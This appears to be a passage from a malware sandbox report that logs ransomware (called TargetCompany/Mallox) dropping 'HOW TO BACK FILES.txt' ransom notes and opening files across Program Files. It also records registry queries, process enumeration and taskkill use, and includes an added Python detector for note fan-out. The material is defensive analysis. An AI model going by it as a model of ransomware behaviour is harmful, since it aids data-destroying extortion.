File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-100_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office15\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-400_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_altform-unplated_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\2.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\1.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireMedTile.scale-200.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
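The rows above show the TargetCompany/Mallox encryption pass from ld.exe: the same note file name is created in directory after directory under Program Files, interleaved with writable handles to existing files of every type (xml, ttf, png, p7x, md, xrm-ms). Two properties make this detectable without knowing the note name or the encrypted-file extension in advance: one file name fanning out across many unrelated directories, and one process touching many extensions across several product directories in a short window. The following is an added example, not part of the report and not the sandbox's own signature: it derives both signals from rows in this table's layout. The sample rows are copied from this page (plus one row from the "Drops file in Windows directory" table as a control); the thresholds and weights are the example's own assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Rows copied from the "Drops file in Program Files directory" table on this
# page, plus the axplont.job row as a non-ransomware control.
SAMPLE_ROWS = [
    r"File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File created C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxSignature.p7x C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\2.jpg C:\Users\Admin\Desktop\a\ld.exe N/A",
    r"File created C:\Windows\Tasks\axplont.job C:\Users\Admin\Desktop\a\random.exe N/A",
]

# "<op> <indicator path> <process path> N/A"; the indicator may contain spaces,
# but never " X:\", so the first drive-letter token after it is the process.
ROW_RE = re.compile(
    r"^(?P<op>File created|File opened for modification) "
    r"(?P<path>.+?) (?P<proc>[A-Z]:\\.+?) N/A$"
)


def profile(lines: List[str], min_note_dirs: int = 3, min_exts: int = 3) -> Dict[str, Dict]:
    """Per process: (a) any file name created in >= min_note_dirs distinct
    directories (a ransom note, found without knowing its name in advance) and
    (b) writable handles to existing files spanning >= min_exts extensions in
    >= 2 product directories (the mass-encryption pass)."""
    created: Dict[str, Dict[str, set]] = defaultdict(lambda: defaultdict(set))
    mod_exts: Dict[str, set] = defaultdict(set)
    mod_roots: Dict[str, set] = defaultdict(set)
    for line in lines:
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        op, path, proc = m["op"], m["path"], m["proc"]
        parent, _, name = path.rpartition("\\")
        if op == "File created":
            created[proc][name.lower()].add(parent.lower())
        else:
            mod_exts[proc].add(name.rpartition(".")[2].lower() if "." in name else "")
            # Product-level directory, e.g. C:\Program Files\Java (3 components).
            mod_roots[proc].add("\\".join(path.split("\\")[:3]).lower())

    verdicts: Dict[str, Dict] = {}
    for proc in set(created) | set(mod_exts):
        notes = {n: len(d) for n, d in created.get(proc, {}).items() if len(d) >= min_note_dirs}
        exts, roots = mod_exts.get(proc, set()), mod_roots.get(proc, set())
        score, reasons = 0, []
        if notes:
            score += 5
            reasons.append(f"note fan-out: {notes}")
        if len(exts) >= min_exts and len(roots) >= 2:
            score += 3
            reasons.append(f"{len(exts)} extensions across {len(roots)} product dirs")
        verdicts[proc] = {"score": score, "notes": notes, "ext_count": len(exts), "reasons": reasons}
    return verdicts


if __name__ == "__main__":
    for proc, v in sorted(profile(SAMPLE_ROWS).items(), key=lambda kv: -kv[1]["score"]):
        print(f'{v["score"]:>2}  {proc}  {"; ".join(v["reasons"]) or "-"}')
```

One caveat on signal (b): in this sandbox's vocabulary "File opened for modification" records that a writable handle was requested, not that bytes were written, so an indexer or an updater can also produce extension diversity; the note fan-out in (a) is the higher-confidence signal and is why the two are scored separately rather than folded into one count.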

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\Desktop\a\random.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617333282974790" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000009c6e09240a1da01a96b3ab041b4da01a96b3ab041b4da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 4400310000000000c158798410006100340009000400efbec1587884c15879842e000000e8330200000009000000000000000000000000000000b5d4b0006100000010000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 00000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "12" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "11" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1226833921" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
